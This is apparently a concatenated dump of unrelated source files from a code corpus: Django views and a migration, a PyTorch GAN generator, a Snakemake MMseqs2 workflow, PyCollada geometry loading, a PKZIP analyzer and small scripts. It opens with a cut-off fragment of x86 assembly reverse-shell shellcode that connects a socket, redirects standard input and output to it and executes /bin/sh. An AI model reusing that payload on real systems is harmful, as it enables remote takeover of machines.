pushw $07a69
movb $0x02, %cl
pushw %cx
movl %esp, %edi
movb $16, %bl
pushl %ebx
pushl %edi
pushl %edx
movl %esp, %ecx
movb $3, %bl
movb $102, %al
int $0x80
xorl %ecx, %ecx
cmpl %eax, %ecx
je good # try jump to binding
# if not connected successfully, try to exit
xorl %eax, %eax
movb $1, %al
int $0x80
# binds socket to IO
good:
xorl %eax, %eax
movb $63, %al
movl %edx, %ebx
int $0x80
xorl %eax, %eax
movb $63, %al
movl %edx, %ebx
movb $1, %cl
int $0x80
xorl %eax, %eax
movb $63, %al
movl %edx, %ebx
movb $2, %cl
int $0x80
# run shell
xorl %eax, %eax
xorl %edx, %edx
pushl %eax
pushl $0x68732f6e
pushl $0x69622f2f
movl %esp, %ebx
pushl %eax
pushl %ebx
movl %esp, %ecx
movb $11, %al
int $0x80
xorl %eax, %eax
movb $1, %al
int $0x80
"""
|
# Read an exclusive lower bound and an exclusive upper bound from stdin.
num, lim = map(int, input().split())
# Print every even number strictly between num and lim, ascending.
start = num + 1 if (num + 1) % 2 == 0 else num + 2
for val in range(start, lim, 2):
    print(val)
996,125 | d2e1533850e3a7016f8a34a8e5cfbf1896446020 | from rest_framework import generics
from rest_framework.filters import SearchFilter
from service.serializers import MagazineDetailSerializer, MagazineListSerializer
from service.utils import MagazineMixin
class MagazineCreateView(MagazineMixin, generics.CreateAPIView):
    """POST endpoint that creates a magazine record."""
    serializer_class = MagazineDetailSerializer
class MagazineListView(MagazineMixin, generics.ListAPIView):
    """GET endpoint listing magazines, searchable on the 'magazine' field."""
    serializer_class = MagazineListSerializer
    filter_backends = [SearchFilter]
    search_fields = ['magazine']
class MagazineDetailView(MagazineMixin, generics.RetrieveUpdateDestroyAPIView):
    """GET/PUT/PATCH/DELETE endpoint for a single magazine record."""
    serializer_class = MagazineDetailSerializer
996,126 | 806354c669b65d85dbf14940974865663d570c4c | import requests, json
from application import app
def getWeChatInfoByCode(code):
    """Exchange a WeChat mini-program login ``code`` for session credentials.

    Calls the jscode2session endpoint with the app id/key from the Flask
    config and returns ``(openid, session_key, unionid)``; each element is
    None when the API response omits it (e.g. on an error response).
    """
    url = "https://api.weixin.qq.com/sns/jscode2session?appid={0}&secret={1}&js_code={2}&grant_type=authorization_code" \
        .format(app.config['MINA_APP']['appid'], app.config['MINA_APP']['appkey'], code)
    r = requests.get(url)
    res = json.loads(r.text)
    # dict.get replaces the original verbose membership checks (which also
    # assigned session_key = None twice).
    return res.get('openid'), res.get('session_key'), res.get('unionid')
996,127 | 3ebf46a2af0fc212f5a223e080ae9d634b9ef8fd | '''
给定两个整数 n 和 k,返回 1 ... n 中所有可能的 k 个数的组合。
示例:
输入: n = 4, k = 2
输出:
[
[2,4],
[3,4],
[2,3],
[1,2],
[1,3],
[1,4],
]
来源:力扣(LeetCode)
链接:https://leetcode-cn.com/problems/combinations
'''
from itertools import combinations
class Solution:
    def combine(self, n: int, k: int) -> "List[List[int]]":
        """Return all k-element combinations drawn from 1..n.

        Delegates to itertools.combinations, which yields combinations in
        lexicographic order (each one as a tuple).

        The return annotation is quoted because this module never imports
        ``typing.List`` — the original unquoted annotation raised NameError
        at class-definition time outside the LeetCode harness.
        """
        # range() is already iterable; no need to materialize it as a list.
        return list(combinations(range(1, n + 1), k))
996,128 | 04b54a3c6660b5e4659bd1dac8a9b534e052eb76 | def gen(l):
    # Generator yielding a coarse type label for each element of l, in order:
    # 'string' for str, 'numeric' for int, 'uh..' for anything else.
    for li in l:
        if type(li) == type('a'):
            yield 'string'
        elif type(li) == type(1):
            yield 'numeric'
        else:
            yield 'uh..'


# Demo (Python 2: note the print statement below).
mylist = ['a', 1, 'b', 12]
for li in gen(mylist):
    print li
996,129 | d7fc92de8d08c84b36d5a2fc5f47240af29e213c | # -*- coding:utf-8 -*-
# Author: Golion
# Date: 2016.2
import sys
import web
# Disable web.py's debug/autoreload behaviour for production serving.
web.config.debug = False

# Route every path to the single Controller class.
urls = (
    '/(.*)', 'controller.Controller'
)
app = web.application(urls, globals(), autoreload=False)
# WSGI entry point used by the application server.
application = app.wsgifunc()
|
996,130 | 8296e3bd015718ccda489d233735fa240d7bd62a | #!/usr/bin/python3
import urllib.request as urllib
import re
# Caesar-style shift by 2: every lowercase letter maps two places forward
# (wrapping), as hinted by the challenge page.
frm = "abcdefghijklmnopqrstuvwxyz"
to = "cdefghijklmnopqrstuvwxyzab"
trans_table = str.maketrans(frm, to)

useUrl = "http://www.pythonchallenge.com/pc/def/map.html"
data = urllib.urlopen(useUrl)
# Honour the page's declared charset, defaulting to UTF-8.
codec = data.info().get_param("charset", "utf-8")
text = data.read().decode(codec)
# The encoded message sits inside the pink <font> block of the page.
test = "".join(re.findall('<font color="#f000f0">(.+?)</tr>', text, re.DOTALL))
print(test.translate(trans_table))
# The decoded message says to apply the same shift to the URL itself.
print(useUrl.translate(trans_table))
996,131 | 9a336a0a88caf6b94548c0d0483e2d7d4b83717a | # -*- coding:utf-8 -*-
import datetime
from util.mysqlHelper import MysqlHelper
from config import config
from report import generate_report
db = MysqlHelper(config.db_ip, config.db_user, config.db_password, config.database, config.db_port)
class Model:
    """Value object holding the distribution analysis for one table."""

    _FIELDS = ('table', 'amount', 'range_count', 'range_percentile',
               'sql', 'total_dbid')

    def __init__(self, table, amount, range_count, range_percentile, sql, total_dbid):
        values = (table, amount, range_count, range_percentile, sql, total_dbid)
        for name, value in zip(self._FIELDS, values):
            setattr(self, name, value)
def analyse_db():
    # For each configured table: run the count query, bucket every row count
    # into fixed size ranges (<=500, 500-1k, 1k-5k, ... >10M), compute each
    # bucket's share of the total, and collect one Model per table.
    # (Python 2 module: print statements below.)
    analyse_results = []
    for table in config.tables:
        sql = config.sql % (config.database, table)
        print datetime.datetime.now(), ' Start Query DB: ' + sql
        results = db.query(sql)
        print datetime.datetime.now(), ' Start Analyse'
        # float so the percentile division below stays fractional in Py2.
        total_dbid = float(len(results))
        amount = 0
        count = []
        for item in results:
            count.append(int(item[0]))
        range_count = {'r0': 0, 'r1': 0, 'r2': 0, 'r3': 0, 'r4': 0, 'r5': 0, 'r6': 0, 'r7': 0, 'r8': 0, 'r9': 0, 'r10': 0}
        for item in count:
            amount += item
            if item <= 500:
                range_count['r0'] += 1
            elif 500 < item <= 1000:
                range_count['r1'] += 1
            elif 1000 < item <= 5000:
                range_count['r2'] += 1
            elif 5000 < item <= 10000:
                range_count['r3'] += 1
            elif 10000 < item <= 50000:
                range_count['r4'] += 1
            elif 50000 < item <= 100000:
                range_count['r5'] += 1
            elif 100000 < item <= 500000:
                range_count['r6'] += 1
            elif 500000 < item <= 1000000:
                range_count['r7'] += 1
            elif 1000000 < item <= 5000000:
                range_count['r8'] += 1
            elif 5000000 < item <= 10000000:
                range_count['r9'] += 1
            else:
                range_count['r10'] += 1
        # Percentage per bucket, formatted to 3 decimals; buckets with zero
        # rows keep the integer 0 default.
        range_percentile = {'r0p': 0, 'r1p': 0, 'r2p': 0, 'r3p': 0, 'r4p': 0, 'r5p': 0, 'r6p': 0,
                            'r7p': 0, 'r8p': 0, 'r9p': 0, 'r10p': 0, 'r11p': 0}
        if range_count['r0']:
            range_percentile['r0p'] = '%0.3f' % float(range_count['r0']*100/total_dbid)
        if range_count['r1']:
            range_percentile['r1p'] = '%0.3f' % float(range_count['r1']*100/total_dbid)
        if range_count['r2']:
            range_percentile['r2p'] = '%0.3f' % float(range_count['r2']*100/total_dbid)
        if range_count['r3']:
            range_percentile['r3p'] = '%0.3f' % float(range_count['r3']*100/total_dbid)
        if range_count['r4']:
            range_percentile['r4p'] = '%0.3f' % float(range_count['r4']*100/total_dbid)
        if range_count['r5']:
            range_percentile['r5p'] = '%0.3f' % float(range_count['r5']*100/total_dbid)
        if range_count['r6']:
            range_percentile['r6p'] = '%0.3f' % float(range_count['r6']*100/total_dbid)
        if range_count['r7']:
            range_percentile['r7p'] = '%0.3f' % float(range_count['r7']*100/total_dbid)
        if range_count['r8']:
            range_percentile['r8p'] = '%0.3f' % float(range_count['r8']*100/total_dbid)
        if range_count['r9']:
            range_percentile['r9p'] = '%0.3f' % float(range_count['r9']*100/total_dbid)
        if range_count['r10']:
            range_percentile['r10p'] = '%0.3f' % float(range_count['r10']*100/total_dbid)
        analyse_results.append(Model(table, amount, range_count, range_percentile, sql, total_dbid))
        print datetime.datetime.now(), ' End'
    return analyse_results
if __name__ == '__main__':
    # Run the analysis, render the report, then release the DB connection.
    generate_report(analyse_db())
    db.close()
996,132 | 0113680ddf4435c1e7f592de2813d457b19493f5 | # Generated by Django 2.1 on 2019-04-28 18:23
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
import model_utils.fields
class Migration(migrations.Migration):
    # Auto-generated by Django (see header). Adds the Cashback model, links
    # it to Member, and alters Member.user_account; edit with care.

    dependencies = [
        ('members', '0011_auto_20190427_0128'),
    ]

    operations = [
        migrations.CreateModel(
            name='Cashback',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('created', model_utils.fields.AutoCreatedField(default=django.utils.timezone.now, editable=False, verbose_name='created')),
                ('modified', model_utils.fields.AutoLastModifiedField(default=django.utils.timezone.now, editable=False, verbose_name='modified')),
                ('amount', models.DecimalField(decimal_places=4, help_text='Amount Requested', max_digits=19, verbose_name='Amount')),
                ('paid_out', models.BooleanField(default=False, help_text='Paid out?', verbose_name='Paid out')),
            ],
            options={
                'verbose_name': 'Cash back request',
                'verbose_name_plural': 'Cash back requests',
            },
        ),
        migrations.AlterField(
            model_name='member',
            name='user_account',
            field=models.OneToOneField(blank=True, editable=False, help_text='User account.', null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='record', to=settings.AUTH_USER_MODEL, verbose_name='User account'),
        ),
        migrations.AddField(
            model_name='cashback',
            name='member',
            field=models.ForeignKey(help_text='Member reference.', on_delete=django.db.models.deletion.CASCADE, related_name='cashback_records', to='members.Member', verbose_name='Member'),
        ),
    ]
996,133 | 8ff266731816df820a6a5b9821adc3c01cf79916 | import torch
import torch.nn as nn
class Generator(nn.Module):
    """DCGAN-style generator mapping a latent (nz, 1, 1) vector to an
    (nc, 256, 256) image in [-1, 1] (Tanh output).

    Channel width starts at ngf*32 and halves at every upsampling stage.
    """

    def __init__(self, nz, ngf, nc, dropout_rate):
        super(Generator, self).__init__()

        def up_block(in_ch, out_ch):
            # 4x4 transposed conv, stride 2: doubles the spatial resolution;
            # followed by BN, 2-D dropout and LeakyReLU (all in-place ops).
            return [
                nn.ConvTranspose2d(in_ch, out_ch, kernel_size=4, stride=2, padding=1, bias=True),
                nn.BatchNorm2d(out_ch),
                nn.Dropout2d(p=dropout_rate, inplace=True),
                nn.LeakyReLU(0.01, inplace=True),
            ]

        # Stem: latent z (1x1) -> (ngf*32) x 4 x 4, no dropout here.
        layers = [
            nn.ConvTranspose2d(nz, ngf * 32, kernel_size=4, stride=1, padding=0, bias=True),
            nn.BatchNorm2d(ngf * 32),
            nn.LeakyReLU(0.01, inplace=True),
        ]
        # Five upsampling stages: 4 -> 8 -> 16 -> 32 -> 64 -> 128.
        for mult_in, mult_out in ((32, 16), (16, 8), (8, 4), (4, 2), (2, 1)):
            layers += up_block(ngf * mult_in, ngf * mult_out)
        # Head: (ngf) x 128 x 128 -> (nc) x 256 x 256, squashed by Tanh.
        layers += [
            nn.ConvTranspose2d(ngf, nc, kernel_size=4, stride=2, padding=1, bias=True),
            nn.Tanh(),
        ]
        self.main = nn.Sequential(*layers)

    def forward(self, input):
        return self.main(input)
996,134 | adc98f82256214a01e7232618700e837426585b5 | MMSEQS2 = config.get('MMSEQS2', 'mmseqs')
# Aggregate targets: one MMseqs2 taxonomy report per sample and database
# ({{db}} stays a wildcard in the base pattern, expanded per rule below).
mmseqs2_base_all = expand('reports/{sample}.mmseqs2.{{db}}.tsv', sample=samples_all)
MMSEQS2_ALL = expand(mmseqs2_base_all, db=['nr', 'refseqc'])

rule mmseqs2_all:
    input: MMSEQS2_ALL

MMSEQS2_FASTA_ALL = expand('reports/{sample}.mmseqs2.{db}.tsv', sample=samples_fasta, db=['nr', 'refseqc'])

rule mmseqs2_fasta_all:
    input: MMSEQS2_FASTA_ALL

rule mmseqs2_refseqc_all:
    input: expand(mmseqs2_base_all, db='refseqc')

rule mmseqs2_nr_all:
    input: expand(mmseqs2_base_all, db='nr')

# Benchmark runs only use the refseqc database.
MMSEQS2_BENCHMARK_ALL = expand('benchmark/{sample}/mmseqs2.refseqc.tsv', sample=benchmark_samples_all)

rule mmseqs2_benchmark_all:
    input: MMSEQS2_BENCHMARK_ALL
def mmseqs2_db(wildcards):
    """Resolve the MMseqs2 database path for the rule's ``db`` wildcard.

    Supported values are 'refseqc' and 'nr'; anything else is a workflow
    configuration error. Raising ValueError (a subclass of the previous bare
    Exception) keeps any callers catching Exception working while naming the
    offending value.
    """
    if wildcards.db == 'refseqc':
        return config['MMSEQS2_REFSEQC_DB']
    elif wildcards.db == 'nr':
        return config['MMSEQS2_NR_DB']
    else:
        raise ValueError('unknown MMseqs2 database: {!r}'.format(wildcards.db))
def mmseqs2_tsv(wildcards):
    """Return the taxonomy-mapping .tsv path that sits next to the MMseqs2 .db file."""
    db_path = mmseqs2_db(wildcards)
    # swap the trailing '.db' (3 characters) for '.tsv'
    return '{}.tsv'.format(db_path[:-3])
MMSEQS2_SHELL = '''
/usr/bin/time -v -o {log.time} \
{MMSEQS2} createdb {input} {params.query_db} 2>&1 | tee {log.log}
/usr/bin/time -a -v -o {log.time} \
{MMSEQS2} taxonomy {params.query_db} {params.db} {params.db_tsv} {TAXONOMY_DB} {params.query_lca_db} {TMPDIR} 2>&1 | tee -a {log.log}
/usr/bin/time -a -v -o {log.time} \
{MMSEQS2} createtsv {params.query_db} {params.query_lca_db} {params.query_lca_tsv} 2>&1 | tee -a {log.log}
{PIGZ} -9 {params.query_lca_tsv}
mv {params.query_lca_tsv}.gz {output.reads}
# MMseqs doesn't automatically delete tmp workdir to cache run progress
rm -r $(readlink -f {TMPDIR}/latest) {TMPDIR}/latest
'''
MMSEQS2_NEW_SHELL = '''
/usr/bin/time -v -o {log.time} \
{MMSEQS2} createdb {input} {params.query_db} 2>&1 | tee {log.log}
/usr/bin/time -a -v -o {log.time} \
{MMSEQS2} taxonomy {params.query_db} {params.db} {params.db_tsv} {params.query_lca_db} {TMPDIR} 2>&1 | tee -a {log.log}
/usr/bin/time -a -v -o {log.time} \
{MMSEQS2} createtsv {params.query_db} {params.query_lca_db} {params.query_lca_tsv} 2>&1 | tee -a {log.log}
{MMSEQS2} taxonomyreport {params.db} {params.query_lca_db} taxonomy.report 2>&1 | tee -a {log.log}
{PIGZ} -9 {params.query_lca_tsv} > {output.reads}
# MMseqs doesn't automatically delete tmp workdir to cache run progress
rm -r $(readlink -f {TMPDIR}/latest) {TMPDIR}/latest
'''
rule mmseqs2:
input: fastx_both_input
output: reads='data/{seq}.mmseqs2.{db}.tsv.gz'
log: log='log/mmseqs2/{seq}.{db}.log',
time='time/mmseqs2/{seq}.{db}.log'
params: db=mmseqs2_db,
db_tsv=mmseqs2_tsv,
query_db='queryDB',
query_lca_db='queryLcaDB',
query_lca_tsv='queryLca.tsv'
shadow: 'shallow'
threads: ALL_CORES
resources: mem=190
shell:
MMSEQS2_SHELL
rule mmseqs2_benchmark:
input: fastx_both_input
output: reads='benchmark/data/{seq}.mmseqs2.{db}.tsv.gz'
log: log='benchmark/log/mmseqs2/{seq}.{db}.log',
time='benchmark/time/mmseqs2/{seq}.{db}.log'
params: db=mmseqs2_db,
db_tsv=mmseqs2_tsv,
query_db='queryDB',
query_lca_db='queryLcaDB',
query_lca_tsv='queryLca.tsv'
shadow: 'shallow'
threads: ALL_CORES
resources: mem=190
benchmark: repeat('benchmark/{seq}/mmseqs2.{db}.tsv', 2)
run:
if benchmark_i == 0:
shell('{DROPCACHE}')
else:
shell('rm {params.query_lca_db} {params.query_db}')
shell(MMSEQS2_SHELL, bench_record=bench_record)
rule mmseqs2_report:
input: data='data/{seq}.mmseqs2.{db}.tsv.gz',
total_reads='info/{seq}.total_reads.txt'
output: 'reports/{seq}.mmseqs2.{db}.tsv'
params: db=config['TAXONOMY_DB']
shell:
'''
metax mmseqs-report {input.data} {output} --total-reads $(cat {input.total_reads}) --tax-dir {params.db}
'''
rule mmseqs2_refseqc_db:
input: faa='db/refseqc/fasta/protein.uniq.faa.gz',
prot=join(TAXONOMY_DB, 'accession2taxid', 'prot.accession2taxid.gz'),
dead_prot=join(TAXONOMY_DB, 'accession2taxid', 'dead_prot.accession2taxid.gz')
output: db='db/refseqc/mmseqs2/refseqc.db'
params: tax_db=config['TAXONOMY_DB'],
dir='db/refseqc/mmseqs2'
benchmark: 'benchmark/db/mmseqs2/refseqc.tsv'
log: time='time/db/mmseqs2/refseqc.log'
run:
shell('''\
/usr/bin/time -v -o {log.time} \
{MMSEQS2} createdb {input.faa} {params.dir}/refseqc.db
''', bench_record=bench_record)
# shell('''
# metax create-mmseqs-taxonomy -o {params.dir}/refseqc.tsv --tax-db {TAXONOMY_DB} --accession2taxid {input.prot} {input.dead_prot} -- {params.dir}/refseqc.db_h
# ''')
|
996,135 | 64f254d13d39f8c587cc82e7ad06198b4361a0a4 | ####################################################################
# #
# THIS FILE IS PART OF THE PyCollada LIBRARY SOURCE CODE. #
# USE, DISTRIBUTION AND REPRODUCTION OF THIS LIBRARY SOURCE IS #
# GOVERNED BY A BSD-STYLE SOURCE LICENSE INCLUDED WITH THIS SOURCE #
# IN 'COPYING'. PLEASE READ THESE TERMS BEFORE DISTRIBUTING. #
# #
# THE PyCollada SOURCE CODE IS (C) COPYRIGHT 2009 #
# by Scopia Visual Interfaces Systems http://www.scopia.es/ #
# #
####################################################################
"""Module for <geometry> data loading."""
from lxml import etree as ElementTree
import numpy
import source
import triangleset
import lineset
import polylist
from collada import DaeObject, DaeIncompleteError, DaeBrokenRefError, \
DaeMalformedError, DaeUnsupportedError, tag
class Geometry( DaeObject ):
    """A class containing the data coming from a COLLADA <geometry> tag"""

    def __init__(self, sources, sourcebyid, vertexsource, primitives, xmlnode=None, gid=None):
        """Create a geometry instance

        :Parameters:
          sources
            A list of data sources (source.Source)
          sourcebyid
            A dictionary mapping source ids to the actual objects
          vertexsource
            A string selecting one of the sources as vertex source
          primitives
            List of primitive objects contained
          xmlnode
            When loaded, the xmlnode it comes from
          gid
            Optional explicit id used when no xmlnode is given; defaults to
            a generated 'geometry<object-id>' string

        """
        self.sources = sources
        """Source list inside this geometry tag."""
        self.sourceById = sourcebyid
        """Sources indexed by id."""
        self.vertexsource = vertexsource
        """The source id used as vertex list."""
        self._primitives = primitives
        if xmlnode is not None:
            self.xmlnode = xmlnode
            self.id = xmlnode.get('id')
        else:
            # BUGFIX: 'gid' was referenced here but never declared anywhere;
            # it is now an explicit optional constructor argument.
            self.id = gid or 'geometry' + str(id(self))
            self.xmlnode = ElementTree.Element('geometry')
            mesh = ElementTree.Element('mesh')
            self.xmlnode.append( mesh )
            # renamed loop variable so it no longer shadows the imported
            # 'source' module
            for src in sources:
                mesh.append( src.xmlnode )
            # BUGFIX: vxml was initialized to '' (a str) and then .append()ed,
            # which raises AttributeError; collect the <input> fragments in a
            # list and join them instead.
            inputs = []
            for semantic, src in self.sourceById[self.vertexsource].items():
                inputs.append('<input semantic="%s" source="#%s" />' % (semantic, src.id))
            vxml = '<vertices id="%s">%s</vertices>' % (self.vertexsource, ''.join(inputs))
            mesh.append( ElementTree.fromstring(vxml) )
            # BUGFIX: the loop iterated over undefined name '_primitives';
            # the constructor argument is called 'primitives'.
            for tset in primitives:
                mesh.append(tset.xmlnode)

    primitives = property( lambda s: tuple(s._primitives) )
    """Primitive object list inside this geometry."""

    @staticmethod
    def load( collada, localscope, node ):
        """Load a Geometry from an xml <geometry> node."""
        meshnode = node.find(tag('mesh'))
        if meshnode is None: raise DaeUnsupportedError('Unknown geometry node')
        sourcebyid = {}
        sources = []
        sourcenodes = node.findall('%s/%s'%(tag('mesh'), tag('source')))
        for sourcenode in sourcenodes:
            ch = source.Source.load(collada, {}, sourcenode)
            sources.append(ch)
            sourcebyid[ch.id] = ch
        _primitives = []
        vertexsource = None
        for subnode in meshnode:
            if subnode.tag == tag('vertices'):
                inputnodes = {}
                for inputnode in subnode.findall(tag('input')):
                    semantic = inputnode.get('semantic')
                    inputsource = inputnode.get('source')
                    if not semantic or not inputsource or not inputsource.startswith('#'):
                        raise DaeIncompleteError('Bad input definition inside vertices')
                    inputnodes[semantic] = sourcebyid.get(inputsource[1:])
                if (not subnode.get('id') or len(inputnodes)==0 or
                        not 'POSITION' in inputnodes):
                    raise DaeIncompleteError('Bad vertices definition in mesh')
                sourcebyid[subnode.get('id')] = inputnodes
                vertexsource = subnode.get('id')
            elif subnode.tag == tag('polylist'):
                _primitives.append( polylist.PolygonList.load( collada, sourcebyid, subnode ) )
            elif subnode.tag == tag('triangles'):
                _primitives.append( triangleset.TriangleSet.load( collada, sourcebyid, subnode ) )
            elif subnode.tag == tag('lines'):
                _primitives.append( lineset.LineSet.load( collada, sourcebyid, subnode ) )
            elif subnode.tag != tag('source'):
                raise DaeUnsupportedError('Unknown geometry tag %s' % subnode.tag)
        geom = Geometry( sources, sourcebyid, vertexsource, _primitives, xmlnode=node )
        return geom

    def save(self):
        """Write back the instance state into its xmlnode."""
        #TODO: Update this with new sourceById format
        for ch in self.sources: ch.save()
        vnode = self.xmlnode.find(tag('mesh')).find(tag('vertices'))
        vinput = vnode.find(tag('input'))
        vnode.set('id', self.vertexsource)
        vinput.set('source', '#'+self.sourceById[self.vertexsource].id)
        for t in self._primitives: t.save()
        self.xmlnode.set('id', self.id)
        self.xmlnode.set('name', self.id)

    def bind(self, matrix, materialnodebysymbol):
        """Create a bound geometry from this one, transform and material mapping"""
        return BoundGeometry(self, matrix, materialnodebysymbol)
class BoundGeometry( object ):
    """A geometry bound to a transform matrix and materials mapping."""

    def __init__(self, geom, matrix, materialnodebysymbol):
        """Bind `geom` to a world transform and a symbol->material map."""
        self.matrix = matrix
        self.materialnodebysymbol = materialnodebysymbol
        self._primitives = geom._primitives
        self.original = geom

    def __len__(self):
        return len(self._primitives)

    def primitives(self):
        """Iterate through all the primitives inside the geometry."""
        for prim in self._primitives:
            yield prim.bind( self.matrix, self.materialnodebysymbol )
|
996,136 | 3c98eab30e8eea90dbcc6fec12d34d558805983e | # import hashlib
#
# str_start = '123546'
# print(str_start.isdigit())
#
# import re
#
# start = 'av123456'
# print(re.search(r'^av(\d+)/*', start).group(1))
#
# title = '"U::::u/\ib?\\di*."<>|'
# print(re.sub(r'[\/\\:*?"<>|.]', '', title))
#
# entropy = 'rbMCKn@KuamXWlPMoJGsKcbiJKUfkPF_8dABscJntvqhRSETg'
# appkey, sec = ''.join([chr(ord(i) + 2) for i in entropy[::-1]]).split(':')
#
# print(appkey, sec)
#
# print(''.join([chr(ord(i) + 2) for i in entropy[::-1]]))
# item = []
# for i in entropy[::-1]:
# item.append(chr(ord(i) + 2))
#
# print(''.join(item).split(":"))
#
# appkey = 1
# cid = 2
# quality = 3
# params = 'appkey=%s&cid=%s&otype=json&qn=%s&quality=%s&type=' % (appkey, cid, quality, quality)
# print(params)
# chksum = hashlib.md5(bytes(params + sec, 'utf8')).hexdigest()
# print(chksum)
"""
import sys
import urllib
print(sys.path[1])
import os
print(os.getcwd())
title='慢慢喜欢你1'
path=os.path.join(os.getcwd(),'bilibili_video1',title)
print(path)
print(os.path.exists(path))
# os.makedirs(path)
"""
"""
进度条...
@blocknum #数据块数
@blocksize #单个数据块大小
@totalsize #总共数据大小
"""
# while True:
# try:
# x=int(input('输入数字'))
# break
# except ValueError:
# print('输入错误')
# from http.cookiejar import CookieJar
from http.cookiejar import MozillaCookieJar
from urllib import request
from urllib.parse import urlencode
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36'
}
CookieJar = MozillaCookieJar('cookie.txt')
hander = request.HTTPCookieProcessor(CookieJar)
opener = request.build_opener(hander)
data={
}
login_url='http://www.baidu.com'
req=request.Request(login_url,data=urlencode(data).encode('utf-8'),headers=headers)
opener.open(req)
CookieJar.save(ignore_discard=True)
str='中国 大学'
if str.startswith('中国'):
print(str.replace('中国','').strip())
list_info=['python','c++','java','csharp']
for index,info in enumerate(list_info):
print(index,info)
|
996,137 | 43f5df5fea4dcda79c9ae33bb7212b6216786900 | from __future__ import print_function
from .common import IsolatedTestCase
from .. import (
ECentroidDoesNotExist,
ECentroidAlreadyExists
)
class TestCentroidCrud(IsolatedTestCase):
    """CRUD tests for centroid management against an isolated client instance."""
    def test_centroid_creation_1(self):
        """A freshly created centroid appears in the listing."""
        self.client.create_centroid('centroid-1')
        centroids = self.client.list_all_centroids().centroids
        self.assertEqual(['centroid-1'], centroids)
    def test_centroid_creation_deletion(self):
        """Creating several centroids and deleting one leaves the rest listed."""
        self.client.create_centroid('centroid-1')
        centroids = self.client.list_all_centroids().centroids
        self.assertEqual(['centroid-1'], centroids)
        self.client.create_centroid('centroid-2')
        self.client.create_centroid('centroid-3')
        centroids = self.client.list_all_centroids().centroids
        # compare as sets: listing order is not part of the contract
        self.assertEqual(set(['centroid-1', 'centroid-2', 'centroid-3']), set(centroids))
        self.client.delete_centroid('centroid-2')
        centroids = self.client.list_all_centroids().centroids
        self.assertEqual(set(['centroid-1', 'centroid-3']), set(centroids))
    def test_centroid_creation_already_exists(self):
        """Creating a duplicate centroid raises ECentroidAlreadyExists."""
        self.client.create_centroid('centroid-1')
        with self.assertRaises(ECentroidAlreadyExists):
            self.client.create_centroid('centroid-1')
    def test_centroid_deletion_does_not_exist(self):
        """Deleting an unknown centroid raises ECentroidDoesNotExist."""
        with self.assertRaises(ECentroidDoesNotExist):
            self.client.delete_centroid('centroid-1')
|
996,138 | 2e70ae92c432285dfd7cd3bdfc2f01e6498c64a0 | from random import choice
# Dice-guessing game: the player predicts the die face, we roll a virtual
# die, and running totals are reported after every round until the player
# enters 0.
total_guesses = 0
correct_guesses = 0
again = 1
while int(again) > 0:
    prediction = input("Input your prediction for the face of the dice\n")
    roll = choice(['1', '2', '3', '4', '5', '6'])
    print(roll)
    total_guesses += 1
    if prediction == roll:
        print("You Guessed it Correctly")
        correct_guesses += 1
    else:
        print("You Guessed it Wrong")
    print("Total Guesses are " + str(total_guesses) +
          " and correct guesses are " + str(correct_guesses))
    again = input("Input 1 to play again and 0 to stop\n")
|
996,139 | 9cecea3e1f4afb37ffc1efff6bb1ce3462e51942 | #!/usr/local/bin/python3
"""
Analyze PKZIP file contents
* scan entire file for PKxy headers
* do quick scan by locating EOF header
* can operate on .zip files from a http://URL
(C) 2016 Willem Hengeveld <itsme@xs4all.nl>
"""
from __future__ import division, print_function, absolute_import, unicode_literals
import sys
import os
import binascii
import struct
import datetime
import zlib
import itertools
if sys.version_info[0] == 2:
import scandir
os.scandir = scandir.scandir
def zip_decrypt(data, pw):
"""
INPUT: data - an array of bytes
pw - either a tuple of 3 dwords, or a byte array.
OUTPUT: a decrypted array of bytes.
The very weak 'zip' encryption
This encryption can be cracked using tools like pkcrack.
Pkcrack does a known plaintext attack, requiring 13 bytes of plaintext.
"""
def make_crc_tab(poly):
def calcentry(v, poly):
for _ in range(8):
v = (v>>1) ^ (poly if v&1 else 0)
return v
return [ calcentry(byte, poly) for byte in range(256) ]
crctab = make_crc_tab(0xedb88320)
def crc32(crc, byte):
return crctab[(crc^byte)&0xff] ^ (crc>>8)
def updatekeys(keys, byte):
keys[0] = crc32(keys[0], byte)
keys[1] = ((keys[1] + (keys[0]&0xFF)) * 134775813 + 1)&0xFFFFFFFF
keys[2] = crc32(keys[2], keys[1]>>24)
keys = [ 0x12345678, 0x23456789, 0x34567890 ]
if type(pw)==list:
keys = pw
else:
for c in pw:
updatekeys(keys, c)
for blk in data:
u = bytearray()
for b in bytearray(blk):
xor = (keys[2] | 2)&0xFFFF
xor = ((xor * (xor^1))>>8) & 0xFF
b = b ^ xor
u.append(b)
updatekeys(keys, b)
yield u
def skipbytes(blks, skip, args):
    """
    Yield the byte blocks from `blks` with the first `skip` bytes removed.

    The skipped prefix (e.g. the PKZIP crypt header) is accumulated and,
    when `args.verbose` is set, hexdumped once the skip boundary falls
    inside a block.
    """
    consumed = b''
    for block in blks:
        if skip >= len(block):
            # whole block still lies inside the prefix: swallow it
            skip -= len(block)
            consumed += block
        elif skip:
            # boundary falls inside this block: report and emit the tail
            consumed += block[:skip]
            if args.verbose:
                print("CRYPTHEADER: %s" % binascii.b2a_hex(consumed))
                sys.stdout.flush()
            yield block[skip:]
            skip = 0
        else:
            yield block
def decode_name(name):
    """
    Decode a raw zip entry name (bytes) to a printable str.

    Valid, printable UTF-8 is returned as-is; anything else (bad encoding,
    control characters, exotic whitespace) is rendered as 'hex-<hexdigits>'
    so odd names cannot corrupt terminal output.
    """
    # printable-looking whitespace/separator codepoints we still reject
    nonprint = set('\u0009\u000b\u000c\u001c\u001d\u001e\u001f\u2000\u2001\u2002\u2003\u2004\u2005\u2006\u2008\u2009\u200a\u2028\u2029\u205f\u3000')
    try:
        utf8 = name.decode('utf-8', 'strict')
        if not nonprint & set(utf8) and utf8.isprintable():
            return utf8
    except UnicodeDecodeError:
        pass
    # BUGFIX: b2a_hex returns bytes, and "%s" on bytes under Python 3
    # produced strings like "hex-b'616263'"; decode to get plain hex digits.
    return "hex-%s" % binascii.b2a_hex(name).decode('ascii')
class EntryBase(object):
""" base class for PK headers """
def loaditems(self, fh):
""" loads any items refered to by the header """
pass
def decodedatetime(ts):
    """
    Convert a 32-bit DOS timestamp (date word << 16 | time word) to a
